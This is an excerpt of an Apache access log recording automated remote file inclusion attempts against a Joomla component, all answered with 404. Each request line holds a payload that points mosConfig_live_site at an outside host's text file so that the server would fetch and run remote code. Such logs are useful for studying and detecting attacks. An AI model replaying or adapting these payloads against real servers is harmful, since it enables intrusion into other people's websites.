217.147.29.190 - - [17/May/2009:06:46:39 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:06:46:39 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
94.198.214.29 - - [17/May/2009:06:46:41 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:06:46:41 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:06:46:42 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
